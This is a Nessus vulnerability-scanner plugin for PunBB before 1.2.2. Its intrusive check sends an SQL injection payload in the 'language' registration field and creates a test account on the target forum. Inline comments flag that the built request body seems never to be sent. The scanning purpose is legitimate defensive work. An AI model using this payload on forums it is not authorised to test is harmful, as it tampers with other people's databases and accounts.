PunBB < 1.2.2 Multiple Input Validation Vulnerabilities

2005-02-26T00:00:00
ID PUNBB_INPUT_VALIDATION_VULNS.NASL
Type nessus
Reporter Tenable
Modified 2018-11-15T00:00:00

Description

The remote host is running a version of PunBB that fails to properly sanitize user input to several scripts, thereby enabling an attacker to launch various SQL injection attacks.

In addition, the profile.php script enables anyone to call the change_pass action while specifying the id of an existing user to set their password to NULL, effectively shutting them out of the system.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  # Plugin identity and the advisories it covers.
  script_id(17224);
  script_version("1.22");

  script_cve_id("CVE-2005-0569", "CVE-2005-0570", "CVE-2005-0571");
  script_bugtraq_id(12652);

  script_name(english:"PunBB < 1.2.2 Multiple Input Validation Vulnerabilities");

  # Report text presented to the user.
  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that suffers from
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of PunBB that fails to properly
sanitize user-input to several scripts thereby enabling an attacker to
launch various SQL injection attacks.  

In addition, the profile.php script enables anyone to call the
change_pass action while specifying the id of an existing user to set
their password to NULL, effectively shutting them out of the system.");
  script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=110927754230666&w=2");
  script_set_attribute(attribute:"see_also", value:"http://forums.punbb.org/viewtopic.php?id=6460");
  script_set_attribute(attribute:"solution", value:
"Upgrade to PunBB 1.2.2 or later.");

  # Scoring and timeline metadata.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/02/26");
  script_set_attribute(attribute:"vuln_publication_date", value:"2005/02/24");
  script_cvs_date("Date: 2018/11/15 20:50:18");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  summary["english"] = "Detects input validation vulnerabilities in PunBB";
  script_summary(english:summary["english"]);

  # ACT_MIXED_ATTACK: the check is version-based under safe checks and
  # intrusive otherwise (see the body of the script).
  script_category(ACT_MIXED_ATTACK);

  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
  script_family(english:"CGI abuses");

  # Runtime requirements: the detection plugin must have run first, and
  # CGI scanning must not have been disabled by the user.
  script_dependencie("punBB_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/punBB");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


# Locate the web port; skip hosts that cannot serve PHP at all.
port = get_http_port(default:80);
if (!can_host_php(port:port)) {
  exit(0);
}


# Test an install.
#
# The install string comes from the KB entry written by punBB_detect.nasl
# and has the form "<version> under <dir>".  Two paths follow: with safe
# checks enabled the verdict rests on the version number alone; otherwise
# the plugin performs an intrusive test that registers an account on the
# remote forum.  If the KB string does not match the expected form the
# script simply falls through without reporting anything.
install = get_kb_item(string("www/", port, "/punBB"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
  ver = matches[1];
  dir = matches[2];

  # If safe_checks are enabled, rely on the version number alone.
  if (safe_checks()) {
    if (
      # Either the version is 1.1.x - 1.2.1 or
      # (the pattern accepts any 1.1 release, exactly "1.2", and "1.2.1"
      #  followed by a non-digit or end of string, so 1.2.10+ is not matched)
      ereg(pattern:"^1\.(1|2$|2\.1([^0-9]|$))", string:ver) ||
      # the version is unknown and report paranoia is Paranoid.
      ("unknown" >< ver && report_paranoia == 2)
    ) {
      security_hole(port);
      set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
      exit(0);
    }
  }
  # Otherwise, try to exploit it.
  # NOTE: this path modifies the target (it creates a forum account); the
  # report emitted below asks the administrator to remove that account.
  else {
    # Specify a user / password to register. gettimeofday() serves
    # to avoid conflicts and have a (somewhat) random password.
    # nb: 'pass' is assigned here but never referenced below -- the two
    #     password form fields use the literal "whatever" instead.
    now = split(gettimeofday(), sep:".", keep:0);
    user = string("nessus", now[0]);
    pass = now[1];

    # Try to create a new user.
    # The request body is a hand-built multipart/form-data document; each
    # part is "--bound", a Content-Disposition header, a blank line and
    # the field value, and the final "--bound--" closes the message.
    url = "/register.php?action=register";
    bound = "bound";
    boundary = string("--", bound);
    postdata = string(
      boundary, "\r\n", 
      'Content-Disposition: form-data; name="form_sent"', "\r\n",
      "\r\n",
      "1\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="req_username"', "\r\n",
      "\r\n",
      user, "\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="req_password1"', "\r\n",
      "\r\n",
      "whatever\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="req_password2"', "\r\n",
      "\r\n",
      "whatever\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="req_email1"', "\r\n",
      "\r\n",
      user, "@example.com\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="language"', "\r\n",
      "\r\n",
      # nb: we're supplying values for language, style, registered, 
      #     registration_ip, and last_visit. A value of 0 for
      #     'registered' implies the user registered in 12/31/1969,
      #     which is the basis for our check below.
      "English','Oxygen',0,'0.0.0.0',0) -- \r\n",

      boundary, "--", "\r\n"
    );

    # NOTE(review): 'postdata' is built above but this call passes no
    #     data: argument, so the POST body appears to be empty and the
    #     check below would not trigger -- confirm against the
    #     http_send_recv3() signature in http.inc.
    r = http_send_recv3(method: "POST",  item: dir + url, port: port,
      content_type: "multipart/form-data; boundary="+bound );
    if (isnull(r)) exit(0, "The web server did not answer");
    # The registration response is not inspected; 'res' is overwritten by
    # the user-list response below.
    res = r[2];

    # Now check the User List for the user we just created.
    # ('dir' already carries a leading '/', per the eregmatch pattern above.)
    # nb: unlike the POST above, this failure exit gives no reason string.
    r = http_send_recv3(method:"GET", port:port,
      item:string(dir, "/userlist.php?username=", user, "&show_group=-1&sort_dir=ASC&search=Submit") );
    if (isnull(r)) exit(0);
    res = r[2];

    # If they registered in 1969, there's a problem.
    # The pattern looks for a 1969 date in a 'tcr' table cell, i.e. the
    # injected 'registered' value of 0 was stored as the registration date.
    if (egrep(pattern:'class="tcr">.*1969.*</td>', string:res)) {
      rep  = string(
        "**** Nessus has successfully exploited this vulnerability by registering\n",
        "**** the user ", user, " to PunBB on the remote host;\n",
        "**** you may wish to remove it at your convenience.\n"
      );
      security_hole(port:port, extra: rep);
      set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
      exit(0);
    }
  }
}